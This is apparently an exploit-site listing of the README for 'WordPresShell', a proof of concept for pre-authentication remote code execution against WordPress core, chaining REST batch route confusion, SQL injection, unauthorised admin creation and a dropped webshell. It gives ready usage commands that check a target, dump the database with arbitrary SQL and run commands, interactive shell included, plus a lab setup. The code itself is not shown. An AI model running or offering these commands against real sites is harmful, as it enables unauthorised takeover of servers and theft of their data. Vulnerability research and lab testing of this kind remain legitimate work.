Share
## https://sploitus.com/exploit?id=44801C66-CC47-586B-A3EB-E4112C53B6BE
# WordPresShell

Pre-auth RCE PoC for **CVE-2026-63030** + **CVE-2026-60137** (WordPress core).
REST `/batch/v1` route confusion โ†’ `WP_Query author__not_in` SQLi โ†’ unauthenticated
admin creation โ†’ webshell. Single file, Python stdlib only.

Vulnerability: Adam Kues (Searchlight Cyber). Affected: 6.9.0โ€“6.9.4, 7.0.0โ€“7.0.1. Fixed: 6.9.5 / 7.0.2.

## Usage

```
python3 WordPresShell.py check http://target                      # confirm (non-destructive)
python3 WordPresShell.py dump  http://target [--query "SELECT @@version"]
python3 WordPresShell.py shell http://target --cmd "id"           # crack-free RCE
python3 WordPresShell.py shell http://target -i                   # interactive
python3 WordPresShell.py shell http://target --user U --password P --cmd id
```

## Lab

```
docker compose up -d          # WordPress 7.0.1 on :8092
docker compose down -v        # teardown
```

`shell` creates an admin and drops a webshell โ€” remove both after testing.
Authorized testing only.